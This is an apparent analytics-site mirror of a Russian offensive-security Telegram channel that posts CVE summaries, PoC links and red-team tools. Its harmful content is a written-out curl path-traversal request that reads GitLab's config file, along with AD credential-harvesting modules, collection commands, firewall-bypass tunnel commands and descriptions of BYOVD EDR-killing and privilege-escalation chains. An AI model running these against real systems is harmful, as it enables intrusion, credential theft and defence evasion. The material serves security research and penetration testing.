Whitehat Lab
Ir al canal en Telegram
Авторский канал об информационной безопасности Свежие CVE, Red Team инструменты, внутренняя инфраструктура и другое Edu only Автор: @exited3n
Mostrar más3 158
Suscriptores
+424 horas
+337 días
+6730 días
Carga de datos en curso...
Canales Similares
Sin datos
¿Algún problema? Por favor, actualice la página o contacte a nuestro gerente de soporte.
Nube de Etiquetas
Menciones Entrantes y Salientes
---
---
---
---
---
---
Atraer Suscriptores
septiembre '26
septiembre '26
+81
en 0 canales
agosto '26
+106
en 1 canales
Get PRO
julio '26
+196
en 4 canales
Get PRO
junio '26
+109
en 3 canales
Get PRO
mayo '26
+104
en 2 canales
Get PRO
abril '26
+183
en 5 canales
Get PRO
marzo '26
+262
en 7 canales
Get PRO
febrero '26
+258
en 3 canales
Get PRO
enero '26
+358
en 2 canales
Get PRO
diciembre '25
+108
en 5 canales
Get PRO
noviembre '25
+123
en 1 canales
Get PRO
octubre '25
+208
en 2 canales
Get PRO
septiembre '25
+133
en 2 canales
Get PRO
agosto '25
+232
en 5 canales
Get PRO
julio '25
+201
en 6 canales
Get PRO
junio '25
+156
en 4 canales
Get PRO
mayo '25
+841
en 4 canales
| Fecha | Crecimiento de Suscriptores | Menciones | Canales | |
| 16 septiembre | +5 | |||
| 15 septiembre | +4 | |||
| 14 septiembre | +8 | |||
| 13 septiembre | +8 | |||
| 12 septiembre | +8 | |||
| 11 septiembre | +1 | |||
| 10 septiembre | +15 | |||
| 09 septiembre | +4 | |||
| 08 septiembre | +1 | |||
| 07 septiembre | +6 | |||
| 06 septiembre | +2 | |||
| 05 septiembre | +3 | |||
| 04 septiembre | +5 | |||
| 03 septiembre | +5 | |||
| 02 septiembre | +3 | |||
| 01 septiembre | +3 |
Publicaciones del Canal
💻 0xM0nCrush v0.1.0
В дополнение к посту про BYOVD
Kernel-mode process terminator using a signed BYOVD driver. Works on all Windows 10/11 The tool is a single self-contained executable. It installs the driver through the Service Control Manager, performs the kill, then stops and deletes the service, leaving no persistent artifact behind. Targets are configurable at runtime through a config file, command line, or the built-in defaults🐱 Repo #byovd #windows #rust #kernel ✈️ Telegram 💬 MAX
| 2 | ⚙ Bring Your Own Vulnerable Driver
Коллекция PoC'ов, демонстрирующих, как уязвимые драйверы могут быть использованы для отключения AV/EDR
Техника, при которой атакующий использует легитимный драйвер с действительной цифровой подписью, содержащий известную уязвимость, для получения несанкционированного доступа к режиму ядра операционной системы
🐱 Repo
🔗 Living Off The Land Drivers
📝 Хабр
#BYOVD #drivers #windows #redteam #av #edr #poc
✈️ Telegram 💬 MAX | 537 |
| 3 | 😥 CVE-2026-55040
Неправильная проверка JWT в SharePoint Server Subscription Edition приводит к произвольному входу в учетную запись
By leveraging CVE-2026-55040, a remote unauthenticated attacker can assume the identity of any SharePoint site user; the prerequisite is the attacker must know in advance the user they wish to identify as. This can be achieved in a number of ways, including via a user’s Active Directory (AD) Security ID (SID), or via a user’s AD User Principal Name (UPN)
🔗 Research
🔗 Rapid7 research
🐱 PoC
#cve #poc #sharepoint #windows #jwt
✈️ Telegram 💬 MAX | 666 |
| 4 | 📄 Доклады с конференции Black Hat USA 2026
The premier cybersecurity event of the year returns to Mandalay Bay with a re-engineered, six-day program built to ignite innovation, push boundaries, and bring the global security community together like never before
🐱 Slides
#blackhat #blackhatusa
✈️ Telegram 💬 MAX | 784 |
| 5 | ⚙️ CVE-2026-85706 - GitLab CE/EE unauthenticated arbitrary file read
Критическая (CVSS 10.0) уязвимость в GitLab, которая позволяет неавторизованному пользователю читать произвольные файлы на сервере
Path traversal в API коммитов репозитория. В уязвимых версиях API не убирает последовательности обхода (например, ../ или их кодированные варианты), что позволяет выйти за пределы нужного каталога и добраться до файловой системы сервера
Уязвимы:
🐥 8.7 до 19.1.7 включительно
🐥 19.2 до 19.2.5 включительно
🐥 19.3 до 19.3.1 включительно
Ручная проверка:
curl -sk -X POST \
"https://gitlab.example.com/api/v4/projects/35/repository/commits/?file=&file.path=%2Fopt%2Fgitlab%2Fembedded%2Fservice%2Fgitlab-rails%2Fconfig%2Fgitlab.yml&file.size=1&Content-Type=application/x-www-form-urlencoded"
Уязвимый инстанс вернет примерно следующее:
{"message":"400 Bad request - Invalid parameter: invalid %-encoding (## GitLab settings\n gitlab:\n host: gitlab.example.com\n ... )"}
Тестовая лаба:
services:
gitlab:
image: gitlab/gitlab-ce:19.3.1-ce.0
container_name: cve-2026-85706-gitlab
hostname: gitlab.lab
restart: "no"
shm_size: "256m"
ports:
- "127.0.0.1:8929:80" # web / API
- "127.0.0.1:2224:22" # ssh (optional)
environment:
GITLAB_OMNIBUS_CONFIG: |
external_url 'http://127.0.0.1:8929'
gitlab_rails['initial_root_password'] = 'CVE-2026-85706-Lab!'
prometheus_monitoring['enable'] = false
gitlab_rails['log_level'] = 'info'
volumes:
- gitlab-config:/etc/gitlab
- gitlab-logs:/var/log/gitlab
- gitlab-data:/var/opt/gitlab
volumes:
gitlab-config:
gitlab-logs:
gitlab-data:
docker compose -f docker-compose.yml up -d
🐱 PoC
🔗 Patch Release
#cve #poc #gitlab
✈️ Telegram 💬 MAX | 976 |
| 6 | 🐕 IAMhounddog v1.1.0
A tool to help pentesters quickly identify privileged principals and second-order privilege escalation opportunities in unfamiliar AWS environments
💻 Repo
#bhce #aws #pentest
✈️ Telegram 💬 MAX | 755 |
| 7 | 💻 AWSHound
Collects AWS IAM/authorization data and builds a BloodHound OpenGraph
Установка в BH CE:
Administration → Early Access Features and enable OpenGraph Extension Management if it is present and switched off
Administration → OpenGraph Management and upload schema/schema.json
Check the extension appears as AWS (AWSHound), namespace AWS, at the version you expect
Quick Upload, and upload graph.zip
File Ingest, and wait for ingest and analysis to finish
🐱 Repo
#awshound #bhce #aws
✈️ Telegram 💬 MAX | 893 |
| 8 | 🔄 🏃 adPEAS v2.5.0
Отличный инструмент для поиска и сбора информации в 💻 Active Directory
Самый большой релиз с 2.0 версии: 5 новых проверок, 16 дополнений, 138 исправлений
Подробнее
Стандартный запуск:
Import-Module .\adPEAS.ps1
Invoke-adPEAS
Доступные модули:
Domain - поиск базовой информации о контроллерах домена, сайтов, трастов и стандартных парольных политиках
Rights - поиск различных прав, например LAPS, DCSync и т.д.
GPO - базовая информация о групповых политиках
ADCS - информация о центрах сертификации
Creds - ASREPRoast, Kerberoasting, GroupPolicies, Netlogon скрипты, LAPS, gMSA и т.д.
Delegation - поиск делегирования, например ограниченное делегирование, неограниченное делегирование и RBCD (Resource Based Constrained Delegation) для компьютеров и учетных записей
Accounts - информация об аккаунтах
Computer - AD DS, AD CS, Exchange серверы и т.д.
BloodHound - сборщик данных для BH
Варианты запуска:
Invoke-adPEAS -Domain 'contoso.com' -Outputfile 'C:\temp\adPEAS_outputfile' -NoColor
Invoke-adPEAS -Domain 'contoso.com' -Server 'dc1.contoso.com'
Определенная УЗ:
$SecPassword = ConvertTo-SecureString 'Passw0rd1!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('contoso\johndoe', $SecPassword)
Invoke-adPEAS -Domain 'contoso.com' -Cred $Cred
Модули:
Invoke-adPEAS -Module Domain
Invoke-adPEAS -Module Rights
Invoke-adPEAS -Module GPO
Invoke-adPEAS -Module ADCS
Invoke-adPEAS -Module Creds
Invoke-adPEAS -Module Delegation
Invoke-adPEAS -Module Accounts
Invoke-adPEAS -Module Computer
Invoke-adPEAS -Module Bloodhound -Scope All
🐱 Home
#soft #powershell #ad #enumeration
✈️ Telegram 💬 MAX | 807 |
| 9 | ⚙️ CVE-2026-19490 - Citrix NetScaler ADC/Gateway Authentication Bypass
Критическая уязвимость в продуктах Citrix NetScaler ADC и NetScaler Gateway, которая позволяет атакующему, не прошедшему аутентификацию, обойти механизм проверки подлинности. Опасность в том, что устройства NetScaler часто располагаются на периметре сети и обеспечивают удалённый доступ, компрометация такого устройства открывает прямой путь во внутреннюю сеть
Unauthenticated session forgery on Citrix NetScaler ADC / NetScaler Gateway via the SAML HTTP-Redirect binding handler at GET /cgi/samlauth. CVSS 4.0 9.3, CWE-288. Bulletin CTX696939 (2026-08-19), no workarounds
Что делать:
Немедленно обновить все уязвимые устройства до версий 14.1-73.32 (для ветки 14.1) или 13.1-63.21 (для ветки 13.1)
🔗 Research
🐱 PoC
#cve #poc #citrix
✈️ Telegram 💬 MAX | 889 |
| 10 | ⚙ CVE‑2026‑65643 - cPanel Domain Parking RCE
Серьезная уязвимость (CVSS 8.7) в популярной управлялке веб хостингом cPanel/WHM, при определенных условиях позволяет одному клиенту получить root права на физическом сервере
Critical command injection vulnerability in cPanel & WHM versions 11.x that allows an authenticated cPanel user to execute arbitrary system commands with root privileges via the domain parking functionality
Уязвимы:
11.110.0.140 и ниже
11.134.0.52 и ниже
11.136.0.36 и ниже
11.138.0.1 и ниже
🐱 Toolkit
#cve #cpanel #whm #rce #poc
✈️ Telegram 💬 MAX | 925 |
| 11 | ⚙️ Living Off the Living Off the Land
Сборник всевозможных Living Off the Land
A single, searchable directory of the community's Living-Off-the-Land security research - every LOLBin, LOLDriver, and adjacent project, indexed and cross-referenced by platform and focus area
🔗 https://lolol.farm
#lolbin #lolfarm #lolbas #gtfo
✈️ Telegram 💬 MAX | 907 |
| 12 | 👍 Выпуск №11, август 2026
🗂 Download
✈️ Backconnect
#magazine #backconnect
✈️ Telegram 💬 MAX | 951 |
| 13 | 🗳 VMware threat emulation techniques
Методы атак для эмуляции угроз в средах VMware
A comprehensive collection of 80+ individual attacker actions that can be simulated against VCF environments in Purple Team exercises
🐱 Repo
🔗 Web
#vmware #esxi
✈️ Telegram 💬 MAX | 1 067 |
| 14 | 🔄🐕 RustHound-CE 2.5.7
Cross-platform and cross-compiled BloodHound collector tool written in Rust, making it compatible with Linux, Windows, and macOS. It therefore generates all the JSON files that can be analyzed by BloodHound Community Edition
Работает с BloodHound-CE
Установка:
# Install from cargo
cargo install rusthound-ce
Сбор:
rusthound-ce -i 192.168.1.10 -d domain.local -u user@domain.local -p 'pass' -z
🖥 Repo
#rusthound #soft #bloodhound #rust
✈️ Telegram 💬 MAX | 1 110 |
| 15 | 💻 ADPathFinder 1.2.0
Инструмент для построения путей атак в домене через BloodHound CE, также покрывает AD CS, MSSQL, SCCM, трасты и т.д.
🔗 Research
ADPathFinder is an attack mapping tool for pentesters and red teamers. It analyses SharpHound data and unifies it with OpenGraph plugins to surface attack paths to high-value targets such as Domain Admins and Domain Controllers, starting from low-privileged users and computers
🐱 Repo
📚 Wiki
#windows #adpathfinder #soft
✈️ Telegram 💬 MAX | 1 163 |
| 16 | 🐸 Frogscope
Full external application attack surface management and exposure management
🐱 Repo
#soft #python
✈️ Telegram 💬 MAX | 1 131 |
| 17 | 🔒 Certi-Bhai — IIS AppPool → NT AUTHORITY\SYSTEM via AD CS RPC
A webshell under IIS AppPool\DefaultAppPool can enroll against the ADCS RPC endpoint and come back with a certificate for the host machine account. Outbound domain traffic from a virtual AppPool identity is authenticated as HOST$, so the default Machine template treats the CSR as a legitimate computer enrollment.
The issued cert produces a PKINIT TGT for that machine account. S4U2Self turns it into an Administrator CIFS ticket on the same box, which is local SYSTEM-equivalent access and a path to hash dump. Potato-family impersonation is not part of the chain.
🔗 Research:
https://www.mannulinux.org/2026/08/Privilege-escalation-from-IIS-AppPool-to-NT-AuthoritySYSTEM-via-AD-CS-RPC-endpoint.html
🔗 Source:
https://github.com/incredibleindishell/Certi-Bhai
#ad #adcs #iis #privesc #pkinit #s4u2self #windows | 1 004 |
| 18 | 🔄💻 Delegations v1.1.0
Delegations is a tool that allows you to work with all types of Kerberos delegations (unconstrained, constrained, and resource-based constrained delegations) in Active Directory
UPD
Отличный инструмент пост эксплуатации для работы со всеми видами делегирования
💻 Repo
#windows #ad #delegations #redteam
✈️ Telegram 💬 MAX | 1 160 |
| 19 | HardBreacher
Zero day уязвимость в Kaspersky Endpoint Security.
Позволяющая локально повысить привилегии (LPE)
#windows #lpe
✈️ Telegram 💬 MAX | 1 729 |
| 20 | 🔄💻 File Tunnel v3.5.3
TCP туннель через файл
Добавлена полная поддержка macOS
Новые FS в v3:
S3 Buckets
Dropbox
FTP
Citrix
Поддерживаемые FS:
Bypassing a firewall:
# Host A
ft.exe -L 5000:127.0.0.1:3389 --write "\\server\share\1.dat" --read "\\server\share\2.dat"
# Host B
ft.exe --read "\\server\share\1.dat" --write "\\server\share\2.dat"
Tunnel TCP through RDP:
# Host A
ft.exe -L 5000:192.168.1.50:8888 --write "C:\Temp\1.dat" --read "C:\Temp\2.dat"
# Host B
ft.exe --read "\\tsclient\c\Temp\1.dat" --write "\\tsclient\c\Temp\2.dat"
💻 Repo
#windows #filetunnel #soft
✈️ Telegram 💬 MAX | 1 438 |
